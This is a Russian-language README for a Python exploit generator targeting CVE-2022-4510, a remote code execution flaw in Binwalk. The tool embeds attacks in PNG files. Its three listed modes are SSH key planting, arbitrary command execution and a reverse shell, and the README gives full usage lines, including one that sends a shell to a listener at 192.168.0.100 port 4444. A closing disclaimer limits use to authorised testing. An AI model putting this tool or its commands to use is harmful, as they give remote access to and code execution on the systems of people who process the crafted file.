
Скрипт на Python для генерации эксплойтов, нацеленных на CVE-2022-4510 RCE в Binwalk. Он поддерживает опции SSH, выполнения команд и обратного шелла. Эксплойты сохраняются в формате PNG. Идеально подходит для тестирования и демонстраций.
Этот скрипт позволяет создавать эксплойты для уязвимости Binwalk CVE-2022-4510. Эксплойты можно использовать для тестирования и демонстрации. Поддерживаемые опции включают SSH, выполнение команд и обратную оболочку.
ssh: Создать эксплойт для SSH.
file: Путь к входному .png файлу.pub: Путь к файлу открытого ключа.command: Создать эксплойт для выполнения команды.
--command: Команда для выполнения.file: Путь к входному .png файлу.reverse: Создать эксплойт для обратной оболочки.
file: Путь к входному .png файлу.ip: IP-адрес слушателя.port: Номер порта слушателя.Примеры использования:
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
Сгенерированный эксплойт будет сохранён как binwalk_exploit.png в текущей директории.
Используйте этот скрипт ответственно и только на системах, на которые у вас есть разрешение для тестирования или демонстрации уязвимостей. Автор не несёт ответственности за любое незаконное или несанкционированное использование этого скрипта.